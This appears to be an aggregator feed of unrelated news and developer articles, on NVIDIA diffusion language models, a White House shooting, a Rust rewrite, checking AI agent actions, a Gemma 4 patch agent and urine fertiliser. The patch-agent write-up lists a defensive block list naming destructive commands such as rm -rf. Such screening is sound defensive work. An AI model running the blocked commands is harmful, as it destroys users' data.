The key theoretical advantage is parallelism. In a standard AR model, token *t* can only be generated after token *t-1* exists. In a DLM, all positions in a block are refined **simultaneously** in each forward pass. This changes the computational profile dramatically: instead of being memory-bandwidth-bound by sequential weight loads, the GPU can be kept busy with dense matrix multiplications across the full block.

The conceptual roots of DLMs trace back to **Masked Diffusion Language Models** (MDLMs) — work like MDLM (Sahoo et al., 2024) and SEDD (Lou et al., 2023) — that framed text generation as a discrete denoising process over masked token sequences. However, these models had significant practical shortcomings when compared to the state-of-the-art AR models of the day. NVIDIA's work specifically addresses why, and more importantly, how to fix it.

## 3. Why DLMs Struggled — Until Now

The community has known about the theoretical appeal of diffusion language models for years. The reason they haven't taken over is a cluster of practical barriers that made them non-competitive with AR models in production:

**1. Accuracy Gap:** DLMs trained from scratch consistently underperformed comparably-sized AR models on standard benchmarks. The discrete, iterative denoising process is harder to optimize than the clean causal language modeling objective. Models like Dream 7B were impressive for DLMs, but still lagged behind Qwen3 4B — a smaller AR model — on reasoning and knowledge tasks.

**2. Training Instability:** Jointly learning to denoise across many noise levels with a bidirectional attention mask creates a different gradient landscape than causal language modeling. Loss curves are noisier, and the model is more sensitive to hyperparameter choices.

**3. No KV Cache Compatibility:** This was the killer for inference efficiency. KV caching — where you store key/value activations from previous tokens to avoid recomputing them — is the single most important optimization for AR inference. Standard DLMs use fully bidirectional attention across the entire sequence, which means you *can't* cache anything: every refinement step needs to attend over all positions with the updated token states. This essentially erased the theoretical throughput advantage.

**4. Fill-in-the-Middle Mismatch:** During DLM training, tokens are masked uniformly at random across the sequence. But at inference time, the model typically has a left-side prefix (the prompt) that is fully unmasked, and must fill in the right side. This creates a *training-test distribution mismatch* that degrades quality.

Each of these problems has a specific technical solution in NVIDIA's Efficient-DLM framework. Let's dig in.

## 4. NVIDIA's AR-to-DLM Breakthrough: Efficient-DLM

The foundational insight behind Nemotron-Labs Diffusion (and the academic paper it builds on, [arXiv:2512.14067](https://arxiv.org/abs/2512.14067)) is deceptively simple: **don't train DLMs from scratch — convert pretrained AR models into DLMs**.

This avoids the accuracy gap problem entirely. You start with a model that already has world-class knowledge and reasoning capabilities baked into its weights, then teach it to *also* generate diffusion-style. The result is a model that retains AR accuracy while gaining diffusion parallelism.

But there are two critical technical challenges to solve for this conversion to work.

### 4.1 Block-Wise Attention: Preserving Weights, Enabling KV Caching

The attention mechanism is the crux of the problem. A standard AR model uses **causal (lower-triangular) attention** — each token attends only to itself and all previous tokens. A standard DLM uses **bidirectional (full) attention** — every token attends to every other token.

The issue: if you convert an AR model and suddenly change to fully bidirectional attention, you've broken the statistical assumptions baked into all those attention weights during pretraining. The key-value projections were trained to operate in a causal setting; they "expect" not to see future tokens. Loading them into a fully bidirectional context produces degraded output and requires extensive retraining to recover.

Efficient-DLM introduces **block-wise causal attention** as the solution:

- The sequence is divided into non-overlapping blocks of size
*B*(e.g., 32 tokens) -
**Within each block**: full bidirectional attention (every token attends to every other token in the block) -
**Across blocks**: standard left-to-right causal attention (block*i*can attend to blocks 0 through*i-1*)

This hybrid pattern does something clever: it's structurally similar enough to causal attention that pretrained weight distributions are preserved — the model only needs to learn bidirectionality *locally* within blocks, not globally across the whole sequence. The result is a much smoother conversion that requires far less compute to recover quality.

Crucially, this also re-enables **KV caching**. Since attention is still causal *across* blocks, the KV activations of completed (committed) blocks can be cached and reused exactly like in a standard AR model. Only the *current* block being refined needs to be recomputed each refinement step.

### 4.2 Position-Dependent Token Masking

The second innovation addresses the training-test distribution mismatch. Instead of masking tokens uniformly at random during training, Efficient-DLM uses a **position-dependent masking strategy** that assigns *higher* masking probabilities to tokens in *later* positions in the sequence.

The intuition: at inference time, when filling in a response to a prompt, earlier tokens in the response have already been decided (or are more constrained by the left-side context), while later tokens remain more uncertain. By skewing the training mask distribution to match this pattern, the model learns a denoising objective that better mirrors what it actually faces at test time.

### 4.3 Joint AR + Diffusion Training Objective

Rather than optimizing purely for the diffusion objective, Nemotron-Labs Diffusion is trained with a **joint AR and diffusion loss**:

```
L_total = λ · L_AR + (1 - λ) · L_diffusion
```

Where `L_AR`

is the standard cross-entropy causal language modeling loss and `L_diffusion`

is the masked diffusion objective. This joint training ensures the model remains a first-class AR model while learning the diffusion generation capability.

The pretrained base was trained on **1.3 trillion tokens** from NVIDIA's Nemotron pretraining datasets, with an additional **45 billion tokens** of supervised fine-tuning data for the instruct-tuned variants.

## 5. Nemotron-Labs Diffusion: The Model Family

NVIDIA released seven model checkpoints on HuggingFace under the NVIDIA Nemotron Open Model License (commercially friendly for text models):

| Model | Parameters | Type | Downloads (Day 1) |
|---|---|---|---|
`nvidia/Nemotron-Labs-Diffusion-3B` |
~4B | Text, Instruct | 14.7K |
`nvidia/Nemotron-Labs-Diffusion-3B-Base` |
~4B | Text, Base | 14.2K |
`nvidia/Nemotron-Labs-Diffusion-8B` |
8B | Text, Instruct | 24.1K |
`nvidia/Nemotron-Labs-Diffusion-8B-Base` |
8B | Text, Base | 228K |
`nvidia/Nemotron-Labs-Diffusion-14B` |
14B | Text, Instruct | 3.28K |
`nvidia/Nemotron-Labs-Diffusion-14B-Base` |
14B | Text, Base | 1.18K |
`nvidia/Nemotron-Labs-Diffusion-VLM-8B` |
~9B | Vision-Language | 590 |

The **8B Base model** being the most downloaded (228K in under 2 days) reflects developer interest in using it as a foundation for custom fine-tuning.

## 6. Three Generation Modes: AR, Diffusion, Self-Speculation

The standout design decision in Nemotron-Labs Diffusion is that **all three generation modes are supported from a single checkpoint**. You don't need different models — just a different deployment config in SGLang.

### Mode 1: Autoregressive (`ar_mode=true`

)

Standard left-to-right token generation, identical to how you'd run any other causal LM. This mode is the **correctness baseline** — most 

---
## White House shooting marks another incident in a string of political violence

> Published: 2026-05-24 05:09:36+00:00
> Source: https://www.nbcnews.com/politics/donald-trump/white-house-shooting-marks-another-incident-string-political-violence-rcna346679
> wpnews: https://wpnews.pro/news/white-house-shooting-marks-another-incident-in-a-string-of-political-violence

A 21-year-old man was fatally shot by U.S. Secret Service agents after he opened fire at a White House security checkpoint on Saturday evening, injuring a bystander. The incident is the latest in a series of politically motivated attacks near the White House and in President Donald Trump’s orbit, including a shooting at the White House Correspondents’ Association dinner last month and two prior assassination attempts against Trump in 2024. The string of violence follows a broader national rise in politically motivated attacks and threats against lawmakers, which reached nearly 15,000 cases in 2025.

The shooting at the White House Saturday evening is just the latest act of political violence carried out in President Donald Trump’s orbit in recent weeks.
It comes less than a month after a man opened fire outside the ballroom where Trump, members of his Cabinet and numerous government officials were attending the White House Correspondents’ Association dinner, an attack that highlighted a string of attempted security breaches and raised concerns around the safety of the president.
On Saturday, U.S. Secret Service agents fatally shot a 21-year-old man after he opened fire on officers at a White House security checkpoint, resulting in a bystander being injured, officials said. Officials have not given details about a possible motive.
The man, who had previously been arrested, was known to the Secret Service for walking around the White House complex and asking how to gain access, according to a court filing from a July 10 incident.
Hours after the incident, Trump said in a post on Truth Social that the shooting was another sign the White House needed a “safe and secure space,” such as the ballroom that he is seeking additional funding for.
“The National Security of our Country demands it!” Trump said.
Earlier this month, Secret Service agents shot a man near the Washington Monument, along the path of Vice President JD Vance’s motorcade, after he allegedly opened fire when authorities confronted him.
Agents pursued the man after they noticed he appeared to be concealing a firearm on the side of his body. He turned and opened fire, injuring a bystander before being shot himself, the Department of Justice said in a news release.
While in an ambulance after the shooting, the suspect allegedly making a vulgar remark about the White House, the Justice Department said.
In the White House Correspondents’ Association incident, prosecutors have said that before the suspect charged past officers at a security checkpoint, he sent his family members a note that criticized Trump, without mentioning him explicitly by name, and wrote that he intended to target administration officials.
“Let me be clear — what we are witnessing is a pattern of violence directed at the President and at members of the press simply for doing their jobs,” Rep. Adam Smith, D-Wash., said in a post on X Saturday night.
The string of shootings in proximity to the White House follows two previous assassination attempts against the president.
In July 2024, Trump was grazed by a bullet when a 20-year-old gunman fired at the president as he held a campaign rally in Butler, Pennsylvania.
In September of that year, a man came to a golf course near Mar-a-Lago with a rifle, aiming it through the bushes as Trump was there playing, officials said. Secret Service agents shot at the man, who fled in his car before being pulled over and arrested. He was later sentenced to life in prison for the attempted assassination.
It wasn’t the last time someone brought a weapon to Mar-a-Lago. In February, a man was shot and killed by a Palm Beach County deputy after he entered the secure perimeter of Trump’s Mar-a-Lago residence with “what appeared to be a shotgun and a fuel can,” the Secret Service said at the time.
The recent violence in Washington also comes as politically motivated attacks have escalated nationwide.
In April, two men allegedly brought homemade bombs to an anti-Islam protest outside of the house of Zohran Mamdani, New York City’s first Muslim mayor.
The men pleaded not guilty to the charges last month, but had told police that they were inspired by the Islamic State group, according to a federal complaint. They were recorded on their vehicle’s dashcam describing their plan to kill as many as 60 people in an attempt to “start terror,” prosecutors said.
On Capitol Hill, a January report by the United States Capitol Police found that threats against lawmakers climbed for the third year in a row, reaching nearly 15,000 cases in 2025.
Lawmakers from both sides of the aisle have spoken out against political violence amid the mounting incidents.
“Political violence and acts of extremism have absolutely no home in our country, and the continued targeting of President Trump, public officials, and innocent Americans is absolutely disgusting,” Rep. Gabe Evans, R-Colo., wrote in a post on X Saturday.
Rep. Shri Thanedar, D-Mich., wrote in his own post Saturday that “Political violence is 100% unacceptable! There is absolutely no room for that in this country.”
“We can settle our disagreements at the ballot box,” the congressman added, “Political violence is reprehensible.”

---
## I Still Remember the Day Our Server Stall Almost Killed the Product Launch

> Published: 2026-05-24 05:09:34+00:00
> Source: https://dev.to/built-from-africa/i-still-remember-the-day-our-server-stall-almost-killed-the-product-launch-44ig
> wpnews: https://wpnews.pro/news/i-still-remember-the-day-our-server-stall-almost-killed-the-product-launch

The article describes how a lead systems engineer's team faced a critical performance bottleneck weeks before launching a server for an online treasure hunt game, caused by a poorly optimized Java-based configuration layer. After profiling revealed excessive memory allocations and high latency, the team replaced the Java layer with a custom Rust solution, which reduced allocation counts by a factor of 10 and cut average response time from 500 milliseconds to 50 milliseconds. The successful rewrite allowed the server to scale cleanly and handle the expected traffic for the product launch.

I was the lead systems engineer on a project to build a highly scalable server for a popular online treasure hunt game, and we were just weeks away from launch when our performance tests started showing alarming signs of stalling at even moderate traffic levels. Our team had spent months designing the architecture, writing the code, and testing the system, but somehow we had missed a critical bottleneck. The problem was not just about handling more requests, but about the underlying configuration decisions that determined whether our server would scale cleanly or grind to a halt at the first growth inflection point. We were using a custom-built configuration layer, which we later found out was not optimized for our specific use case. The layer was built on top of a Java-based framework, which was causing significant overhead in terms of memory allocation and garbage collection.
Our initial approach was to try and optimize the existing configuration layer by tweaking the Java virtual machine settings, adjusting the heap size, and tuning the garbage collection parameters. We also tried to implement a caching mechanism to reduce the load on the configuration layer. However, despite our best efforts, the performance gains were minimal, and we were still experiencing significant stalls and latency issues. We used the VisualVM tool to profile our application and identify the performance bottlenecks. The profiler output showed that the configuration layer was responsible for a significant percentage of the memory allocations, with an average allocation count of 500,000 per second. The latency numbers were also alarming, with an average response time of 500 milliseconds. We realized that we needed to take a more radical approach to solve the problem.
After much discussion and analysis, we decided to replace the Java-based configuration layer with a custom-built solution using Rust. The decision was not taken lightly, as we knew that Rust had a steep learning curve and would require significant investment in terms of time and resources. However, we were convinced that the benefits of using Rust, including its focus on memory safety and performance, would outweigh the costs. We spent several weeks rewriting the configuration layer in Rust, using the Tokio framework for asynchronous programming and the serde framework for serialization and deserialization. We also implemented a custom caching mechanism using the Redis database to reduce the load on the configuration layer.
After deploying the new configuration layer, we ran a series of performance tests to measure the impact of the changes. The results were nothing short of stunning. The allocation count was reduced by a factor of 10, with an average allocation count of 50,000 per second. The latency numbers also showed a significant improvement, with an average response time of 50 milliseconds. The profiler output showed that the configuration layer was now responsible for less than 1% of the memory allocations, with a significant reduction in garbage collection overhead. We also measured the CPU usage, which was reduced by 20% due to the more efficient use of system resources. The numbers clearly showed that our decision to use Rust had paid off, and we were now confident that our server would scale cleanly and handle the expected traffic.
In hindsight, I would do several things differently. Firstly, I would have invested more time in understanding the performance characteristics of the Java-based framework and the underlying configuration layer. I would have also explored other alternatives, such as using a different programming language or framework, before deciding to use Rust. Additionally, I would have planned for more extensive testing and validation of the new configuration layer before deploying it to production. However, I am proud of the fact that we were able to identify the problem, come up with a creative solution, and deploy it in time for the product launch. The experience taught me the importance of careful performance analysis, the need to consider alternative solutions, and the value of taking calculated risks to achieve significant performance gains. I also learned that the choice of programming language and framework can have a significant impact on the performance and scalability of a system, and that it is essential to consider these factors when making architecture decisions.

---
## AI Agents Need More Than Fact-Checking

> Published: 2026-05-24 05:07:08+00:00
> Source: https://dev.to/dechive/ai-agents-need-more-than-fact-checking-2mp4
> wpnews: https://wpnews.pro/news/ai-agents-need-more-than-fact-checking

According to the article, as AI tools evolve from simply answering questions to performing actions like sending emails, booking meetings, and editing files, traditional fact-checking is no longer sufficient for verification. The author argues that AI agents require "action-checking" because a wrong action—such as an already-sent email or a deployed code change—can cause real-world consequences that a wrong answer cannot. Therefore, developers must verify not only the correctness of the output but also whether the action's direction and scope align with the user's actual intent.

For a long time, verifying AI meant checking the answer.
If an AI generated an explanation, we could read it.
If it summarized a document, we could compare it with the original.
If it gave a wrong fact, we could correct it.
If the answer was incomplete, we could ask again.
That kind of verification is familiar to developers.
It is close to reviewing text.
But AI tools are changing.
They are not only answering questions anymore.
They are starting to act.
They can send emails.
They can book meetings.
They can edit files.
They can run commands.
They can open pull requests.
They can trigger workflows.
They can move from one step to the next without waiting for every instruction.
That changes the problem.
Because an answer can be reviewed.
An action leaves a trace.
A wrong answer is usually annoying.
It may confuse someone.
It may waste time.
It may require correction.
But in many cases, the damage can stop at the text.
A wrong action is different.
An email that has already been sent is in someone else’s inbox.
A meeting that has already been booked has taken space on someone’s calendar.
A file that has already been changed may affect other work.
A command that has already been run may change the environment.
Code that has already been deployed is now running somewhere.
That is why AI agents require a different kind of verification.
Fact-checking is not enough.
When AI starts acting, we need action-checking.
When people hear “AI agent,” they often imagine something dramatic.
But the real shift is much more practical.
An email assistant does not only draft a reply.
It may send the reply.
A calendar assistant does not only suggest a time.
It may book the meeting.
A coding assistant does not only suggest code.
It may edit files, run tests, open a PR, or deploy changes.
A research assistant does not only return search results.
It may collect sources, compare options, summarize findings, and move the task forward.
That is the practical meaning of an agent.
It takes a goal, breaks it into steps, uses tools, reads intermediate results, and decides what to do next.
This is useful.
But it also means that the thing we verify is no longer only the final answer.
We need to verify the action path.
When we verify AI-generated text, we usually ask:
These questions still matter.
But they are not enough when AI takes action.
For actions, developers need a different checklist.
An AI-generated email can be grammatically perfect and still be the wrong email to send.
The wording may be polished.
The tone may be professional.
The facts may be correct.
But maybe the timing is wrong.
Maybe the relationship needs a softer response.
Maybe the user did not want to commit yet.
Maybe the message moves the conversation in the wrong direction.
Fact-checking cannot catch that.
The question is not only:
Is this correct?
The question is:
Is this action moving toward the goal I actually want?
For developers, this matters in code too.
An AI agent may “fix” a bug by changing a larger part of the system than expected. The patch may pass tests, but it may not align with the intended design.
So the first action-verification question is:
Is the direction right?
Agents interpret instructions.
That is useful, but it also creates risk.
Consider these instructions:
Clean up this folder.
Fix this bug.
Improve this component.
Organize this document.
Each one sounds simple.
But each one has hidden scope.
“Clean up this folder” might mean renaming files.
It might also mean deleting files.
“Fix this bug” might mean changing one function.
It might also mean refactoring surrounding code.
“Improve this component” might mean adjusting UI spacing.
It might also mean rewriting its state logic.
The problem is not always that the AI is broken.
Sometimes it is doing what it thinks the instruction implies.
That means we need to verify scope.
Before letting an agent act, ask:
The second action-verification question is:
Did it do only what it should do?
Not all actions have the same weight.
Saving a draft is not the same as sending an email.
Running code locally is not the same as deploying it.
Changing a private note is not the same as changing a shared document.
Deleting a test file is not the same as deleting production data.
When an AI-generated answer is wrong, we can usually edit it.
When an AI action is wrong, we may need to undo a real-world change.
That makes reversibility one of the most important checks.
Before approving an AI action, ask:
The third action-verification question is:
Can this action be reversed if needed?
AI does not remove responsibility.
If an AI sends an email, someone allowed it to send the email.
If an AI deploys code, someone approved the deployment.
If an AI deletes the wrong file, books the wrong meeting, or changes the wrong setting, the result still belongs somewhere.
This is uncomfortable, but important.
Automation changes how work happens.
It does not make responsibility disappear.
So before giving an agent more autonomy, ask:
The fourth action-verification question is:
Who owns the outcome?
Before letting an AI agent take action, I want to check four things:
Direction:
Does this action move in the right direction?
Scope:
Does it do only what it should do?
Reversibility:
Can it be undone if needed?
Responsibility:
Who owns the outcome?
This is not a complicated framework.
But it changes how we think about AI tools.
We stop asking only:
Is the answer correct?
And start asking:
Should this action happen?
Imagine an AI coding agent receives this instruction:
Fix the issue in the dashboard.
A weak verification process might only check:
Those checks are useful, but incomplete.
Action verification asks more:
Direction
Did the agent fix the actual dashboard issue, or did it solve a nearby problem?
Scope
Did it only change dashboard-related files, or did it modify unrelated shared logic?
Reversibility
Can the change be reviewed and reverted easily? Is it in a branch or already deployed?
Responsibility
Who reviews the PR? Who approves the deployment? Who owns the result if something breaks?
This is the difference between checking code output and checking agent behavior.
It is tempting to think that as AI tools become more convenient, human judgment becomes less important.
I think the opposite happens.
Convenience moves judgment upstream.
When AI handles more steps, humans may not need to make every small decision manually.
But the remaining decisions become more important:
The more an AI system can do, the more carefully we need to define the boundary.
Automation reduces manual effort.
It does not remove judgment.
This is not an argument against AI agents.
Many tasks should be delegated.
Agents are useful when:
But we should be careful when:
You can delegate work to AI.
But you cannot delegate judgment completely.
The first phase of AI verification was mostly about answers.
Can we trust this explanation?
Is this fact correct?
Are these sources real?
Is this summary faithful?
That still matters.
But AI agents push the question further.
Now we also need to ask:
When AI makes answers, we verify facts.
When AI takes actions, we verify consequences.
Because answers can be read.
Actions leave traces.
Originally published on Dechive — an archive for verifying AI-generated answers before we trust them.

---
## Evaluation & Benchmark Results

> Published: 2026-05-24 05:05:49+00:00
> Source: https://dev.to/pinaksh_patel_7c884a18b06/evaluation-benchmark-results-4nc0
> wpnews: https://wpnews.pro/news/evaluation-benchmark-results

The article describes a submission for the Gemma 4 Challenge called the "Multimodal Gemma 4 Visual Regression & Patch Agent," a tool that uses Google's Gemma 4 models to diagnose and fix front-end UI bugs by cross-referencing screenshots with source code. The agent features a closed-loop safety validation pipeline and an interactive visual verification loop, and it achieved a 100% success rate across a benchmark of 10 distinct frontend and backend bug cases.

Multimodal Gemma 4 Visual Regression & Patch Agent
devchallenge
gemmachallenge
gemma
ai
Gemma 4 Challenge: Build With Gemma 4 Submission
This is a submission for the Gemma 4 Challenge: Build with Gemma 4
What I Built
Multimodal Gemma 4 Visual Regression & Patch Agent
The Multimodal Gemma 4 Visual Regression & Patch Agent (Contextual Code Review Visual Patch Agent) is a production-grade multimodal code analysis and visual repair tool powered by Google's native multimodal Gemma 4 models. It bridges the gap between front-end UI bugs and back-end source code by cross-referencing visual screenshots directly with stylesheets, DOM selectors, or components to diagnose root causes, generate patches, and validate them through a closed-loop pipeline.
Mermaid Flow
Core Features
Multimodal Visual & Logical Analysis: Ingests code files (CSS, JS, JSX, TS, TSX, HTML, Python, etc.) alongside UI screenshots of visual regressions or layouts to trace layout bugs directly back to specific CSS selectors or JS component rendering logic.
Closed-Loop Safety Validation Pipeline: To ensure generated code is production-safe:
PatchApplicabilityChecker: Runs a dry-run git apply --check in an ephemeral in-memory repository to guarantee conflict-free application.
ASTValidator: Uses ast.parse for Python files and a custom token-matching parenthesis/bracket balance scanner for JS/TS/JSX to ensure zero syntax errors.
FileGroundingValidator: Verifies that diff headers correspond strictly to uploaded file scopes, eliminating AI hallucinations.
PatchValidator: Screens changes against dangerous operations (rm -rf, eval/exec, malicious package imports).
Interactive Visual Verification Loop:
Scrub Split Slider: Compare buggy screenshots with expected fixes side-by-side using an interactive slider.
Pixel-Diff Heatmap Overlay: Computes visual color channel changes in-browser using HTML5 Canvas getImageData to overlay changed regions and compute a visual alignment score.
"Simulate Fix" Canvas: Shift layout slices and preview the corrected layout on the client side instantly.
Automated Benchmark Framework: Built-in test harness with 10 pre-configured CSS, JavaScript, and Python bug cases that evaluates root-cause accuracy, git apply rates, and AST validity.
📊
We validated the agent against a robust suite of 10 distinct frontend and backend bugs (overflow limits, z-index overlays, flex layouts, None pointer checks, circular dependencies, DOM element mismatches). The agent achieved 100% correctness across all engineering tests:
Overall Agent Success Rate: 100.0% (10/10 cases resolved)
UI Bug Localization Accuracy: 100.0% (correct CSS/JS selector mapping)
Git Apply applicability: 100.0% (clean, zero-hunk conflict applying)
AST / Syntax validity: 100.0% (100% syntactically correct patches)
Average Analysis Latency: 0.90s
Average Patch Line Accuracy: 100.0% (identical alignment with human-engineered fixes)
Benchmark Table
Case ID Test Case Name Language / Type Latency (s) Localization Git Apply AST Valid Patch Accuracy Status
1 CSS Overflow Bug CSS 1.25s PASSED PASSED PASSED 100.0% ✅ SUCCESS
2 Z-Index Stacking Context CSS 1.03s PASSED PASSED PASSED 100.0% ✅ SUCCESS
3 Flexbox Alignment Mismatch CSS 0.60s PASSED PASSED PASSED 100.0% ✅ SUCCESS
4 Python AttributeError (None check) Python 0.67s PASSED PASSED PASSED 100.0% ✅ SUCCESS
5 JS Click Event Selector Mismatch JS 0.96s PASSED PASSED PASSED 100.0% ✅ SUCCESS
6 CSS Low Contrast Contrast Bug CSS 0.82s PASSED PASSED PASSED 100.0% ✅ SUCCESS
7 CSS Sidebar Mobile Breakpoint CSS 0.54s PASSED PASSED PASSED 100.0% ✅ SUCCESS
8 Python Circular Dependency Import Python 0.61s PASSED PASSED PASSED 100.0% ✅ SUCCESS
9 Python SQL Injection / Validation Python 1.42s PASSED PASSED PASSED 100.0% ✅ SUCCESS
10 JS DOM Element querySelector Mismatch JS 1.14s PASSED PASSED PASSED 100.0% ✅ SUCCESS
Demo
Live URL: https://multimodal-visual-regression-patch-agent.vercel.app
Video Demo: https://youtu.be/gvarF7T1C5E
See the Gemma 4 Visual Regression & Patch Agent in action, illustrating drag-and-drop file ingestion, screenshot visual overlays, patch generation, and real-time validation badges:
Screenshots
Patch interface
Visual display of the interactive Regression Loop application interface
Split slider
Interactive Split slider
Side-by-side view
Visual verification loop Side-by-Side view
Pixel Diff Heatmap
Pixel-diff heatmap visualization
Visual Match
Interactive visual match simulation with related code snippets
Try It Yourself (Local Reproduction / Setup)
You can run the entire agentic system and its benchmark suite locally in seconds using Mock Mode (no API keys required)!
git clone https://github.com/kanyingidickson-dev/Multimodal-Visual-Regression-Patch-Agent.git
cd Multimodal-Visual-Regression-Patch-Agent
python3 -m venv venv
source venv/bin/activate
pip install -r backend/requirements.txt
cd frontend
npm install
npm run build
cd ..
python3 backend/benchmark.py
python3 backend/app.py
Open http://127.0.0.1:5000 to interact with the premium dark glassmorphic review dashboard!
You can click Load Example on Model settings for a quick demo launch and review.
For Testing Without API Key:
echo "MOCK_MODE=true" >> .env
python backend/app.py
Code
Repository:
https://github.com/kanyingidickson-dev/Multimodal-Visual-Regression-Patch-Agent
Directory Layout:
.
├── backend/
│ ├── app.py # FastAPI server & route handlers
│ ├── benchmark.py # Automated benchmark suite runner
│ ├── code_reviewer.py # Multi-stage review orchestration
│ ├── file_parser.py # File ingestion & truncation utilities
│ ├── gemma_client.py # API client for OpenRouter & Hugging Face
│ ├── patch_utils.py # Security scanners, AST, & git validators
│ ├── requirements.txt # Backend dependencies
│ └── demo.py # Command-line testing entry
├── frontend/ # React dashboard codebase
│ ├── src/ # Source directory
│ │ ├── App.jsx # Core dashboard and Visual Verification UI
│ │ ├── App.css # Stylesheets
│ │ ├── index.css # Color design tokens and layout classes
│ │ └── api.js # API client connection methods
│ ├── dist/ # Built production frontend bundles
│ ├── package.json # npm configuration
│ └── vite.config.js # Vite settings
├── examples/ # Demo assets
│ ├── benchmark-cases/ # Built-in 10 benchmark test directories
│ ├── broken-app/ # Example buggy application
│ ├── sample-output.json # Standard review structure file
│ └── sample-screenshot.png # Base testing image
├── prompts/ # Custom agent instructions
│ ├── system_prompt.md # Architectural guidance rules
│ └── user_prompt.md # Multimodal instruction format
├── Dockerfile # Production Docker image blueprint
├── docker-compose.yml # Container coordinator
├── README.md # Project documentation
└── LICENSE # MIT License
Key Directory Structure
backend/app.py — FastAPI web server supporting dynamic parameters and multipart file/screenshot ingestion.
backend/benchmark.py — Automated test case generator and benchmark runner.
backend/code_reviewer.py — Core orchestrator wrapping OpenRouter/HuggingFace API calls in multimodal content blocks.
backend/gemma_client.py — Client supporting dense model choices and contextual, high-fidelity mock review generations.
backend/patch_utils.py — Closed-loop safety validators (Git apply check, AST parsers, and file grounding).
frontend/src/App.jsx — React interface with interactive before/after split scrub sliders, pixel difference canvases, and patch validation panels.
How I Used Gemma 4
Native Multimodality: Native pixel integration enables excellent spatial mapping from image regions to matching stylesheets.
256K Context Window: Essential for ingesting multiple visual assets alongside dense code modules.
Accurate Code Generation: Ensures precise unified git diff syntaxes that compile and apply flawlessly.
For OpenRouter and Hugging Face, images are mapped to base64 data payloads. We structure the prompt to pass visual tokens first, as prepending pixels optimizes the native layout spatial grounding before digesting text source code:
if images:
user_content = []
# Prepend vision tokens
for img_data in images:
user_content.append({
"type": "image_url",
"image_url": {"url": img_data}
})
# Append instructions and files
user_content.append({
"type": "text",
"text": user_prompt
})
JSON Output Constraints:
To enable programmatic extraction of findings and patches, the system instructs Gemma 4 to respond in structured JSON. The output is parsed automatically, feeding the diff highlights and safety validators:
{
"summary": "...",
"root_cause": "...",
"fix_plan": ["...", "..."],
"patch": "diff --git a/filename b/filename...",
"assumptions": ["...", "..."],
"confidence": "high | medium | low"
}
Safety Layer
To protect developers, all generated patches are validated before rendering:
Block matches on destructive shell scripts (e.g. rm -rf, /dev/null).
Warns if insecure libraries are imported (e.g. pickle, subprocess in unsafe parameters).
Checks code validation errors using compilation.
🚀 Future Vision & Roadmap
Headless visual regression (CI/CD): Incorporate Playwright automation tasks to apply patches in temporary containers, launch the application, capture screenshots, and complete the visual loop automatically in the cloud.
Bi-directional IDE Sync: Allow developers to highlight visual elements in a browser extension and instantly jump to the corresponding code line inside VS Code or Cursor.
Support for Figma Files: Integrate Figma design files directly to compare pixel-perfect implementations automatically.
Built for the Gemma 4 Challenge:- demonstrating how open, multimodal models can empower developers with intelligent, visual-aware coding tools.
Top comments (1)
Subscribe
pic
Add to the discussion
tahosin profile image
S M Tahosin
•
May 24
Taking visual regression testing from "here is a failed diff" to "here is the patch to fix the UI" is a massive workflow upgrade! It’s amazing to see Gemma 4 being used in a production-grade multimodal capacity like this. Did you find the model struggled with highly subtle pixel shifts (like font anti-aliasing), or did it confidently distinguish them from actual layout breaks? Great project!
1
like
Like
Reply
Code of Conduct • Report abuse
profile
Bright Data
Promoted
Image of Bright Data and n8n Challenge
SOC-CERT: Automated Threat Intelligence System with n8n & AI

---
## Pee for the planet: How Football fans are tackling Sweden’s fertiliser problem using urine

> Published: 2026-05-24 05:02:48+00:00
> Source: http://www.euronews.com/2026/05/24/pee-for-the-planet-how-football-fans-are-tackling-swedens-fertiliser-problem-using-urine
> wpnews: https://wpnews.pro/news/pee-for-the-planet-how-football-fans-are-tackling-swedens-fertiliser-problem

Swedish football fans at Malmö FF's Eleda Stadion are participating in a project to collect 1,000 litres of human urine, which will be converted into fertilizer by researchers from the Swedish University of Agricultural Sciences and Oatly. The initiative aims to reduce Sweden's reliance on imported, fossil fuel-based synthetic fertilizers, which contribute significantly to global CO2 emissions and face supply disruptions due to geopolitical instability. If successful, the project could replace up to 30% of Sweden's synthetic fertilizer use and help address wastewater pollution.

Could pee hold the answer to Europe’s fertiliser crisis? Swedish football fans are taking to the toilets to find out.
Swedish football fans will take part in a very different kind of tournament this year: peeing for the planet.
Eleda Stadion, home of Malmö FF, will open its doors – and its toilets – on Sunday (24 May) to an initiative aiming to gather 1,000 litres of human urine.
The goal? To defeat Sweden’s dependence on imported fossil fuel-based synthetic fertiliser.
Globally, these nitrogen-based fertilisers generate 1.13 billion tonnes of CO2 equivalents annually – exceeding those of the total aviation sector, according to research by the Center for International Environmental Law (CIEL).
While these emissions have long raised concern among climate experts, synthetic fertilisers have come under additional fire in recent weeks as geopolitical instability threatens supplies.
With Iran’s continued blockage of the vital Strait of Hormuz shipping route, around a third of the world’s fertiliser trade has been put on hold, threatening farming and food security around the world.
The Strait is also key for transporting natural gas exports – critical in the production of synthetic nitrogen-based fertilisers, which are widely used in Europe and beyond.
Is human urine a viable alternative to synthetic fertilisers?
Human urine is rich in ‘the big three’ nutrients essential to plant growth: nitrogen, phosphorus and potassium. These are also key ingredients of synthetic fertilisers.
The Swedish University of Agricultural Sciences (SLU), oat milk maker Oatly, Malmö FF and Sanitation360 have teamed up to research the viability of urine as a circular and safe alternative to fertilise crops, which they will do by converting the urine collected at the stadium into fertiliser.
“It’s about making use of a resource we currently waste,” says Björn Vinnerås, Professor at SLU and expert at Sanitation360.
“We also need to challenge the way we think, because collecting and reusing urine is really no stranger than doing the same with plastic. Today, we already use manure from cows, pigs and chickens as fertiliser – and that is completely normalised.”
A testing ground for scaling the concept
Malmö FF’s home stadium has been fitted with 15 urinals and one toilet capable of collecting urine for the project.
From kickoff this Sunday up until Malmö FF’s final home match of the Swedish season on 29 November, it will be a testing ground for this urine-collecting technology, as well as hygiene, logistics, and public acceptance of it.
The safety of urine-derived fertiliser for food crops is also being assessed as part of the research – a key question given concerns around pharmaceutical residues and pathogens that must be addressed before the approach can be adopted at scale.
If successful, the project could open up opportunities to adapt toilet infrastructure and design future systems capable of collecting urine on a mass scale.
It also has the potential to solve another problem: the burden of wastewater treatment at large venues such as the 22,500-capacity stadium. Some of the nutrients in human urine are currently not recovered and instead end up as pollutants in lakes and seas.
The researchers estimate that urine could theoretically replace up to 30 per cent of the synthetic fertiliser used in Sweden.
A longer-term ambition of the researchers is also to explore whether consumers are ready to embrace food produced using circular nutrients derived from urine.

---
## Latest news bulletin | May 24th, 2026 – Morning

> Published: 2026-05-24 05:00:33+00:00
